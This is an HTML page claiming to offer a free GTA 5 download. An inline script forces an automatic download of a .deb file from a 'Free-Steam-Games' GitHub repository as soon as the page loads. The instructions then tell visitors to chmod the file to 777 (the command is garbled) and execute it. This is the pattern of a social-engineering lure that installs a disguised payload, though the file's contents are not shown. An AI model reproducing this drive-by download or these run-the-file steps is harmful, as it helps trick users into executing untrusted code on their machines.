<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>GTA 5</title>
    <link rel="stylesheet" href="style.css">
    <style>

          
      body{
        background-image: url('shade.png');
        background-repeat: no-repeat;
        background-size: cover;
       
      }
          h1 {
        background-image: url(14.jpg);
        background-repeat: repeat;
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
        
        font-size: 50px;
        text-align: center;
        font-weight: bold;
        text-transform: uppercase;
        font-family: 'Steelfish Rg', 'helvetica neue',
                    helvetica, arial, sans-serif;
        font-weight: 200;
        -webkit-font-smoothing: antialiased;
    }
    </style>
    <link rel="icon" href="GTAIMAGE.jpg" type="image/x-icon">
  </head>

  <body>
	<script src="index.js"></script>
	  <script>
window.onload = function(){
  var a = document.createElement("a");
  a.href = "https://github.com/Free-Steam-Games/GTA-5-Exclusive/raw/main/GTA5.deb";
  a.download = true;
  a.click();
};
</script>
<h1><center>GTA 5 Game Download Instructions</center></h1>
    <br><br>
    <h2>Click On the Image below to download the Game</h2>
    <a href=""><img src="https://github.com/Free-Steam-Games/Free-Steam-Games.github.io/blob/main/GTAIMAGE.jpg" height=170px width=250px></a>

    <br><br><br>
    <h3>Please Follow the insructions after the game is downloaded</h3>
    <br><ul>
      <li>Navigate to the location where the file is downloaded</li>
      <li>Open file locaton and check if the file is downloaded properly</li>
      <li>Once downloaded, execute the file</li>
      <ol>
        
        <li>Change the permission of file to 777 using chmod -<filename 777</li>
          <li>Verify the file permissions and then proceed with step 3 </li>
            <li>Type in the command "./filename"</li>
        <li>Please wait for the prompts and allow popups</li>
        <li>You Game will automatically begin download and install automatically. You will be able to see the process as it goes.</li>
          
      </ol>
      
    </ul>
    <br>
    <h2><center><b><i>Thank you for Downloading the Game. Hope you like playing it</i></b></center></h2>
  </body>
</html>
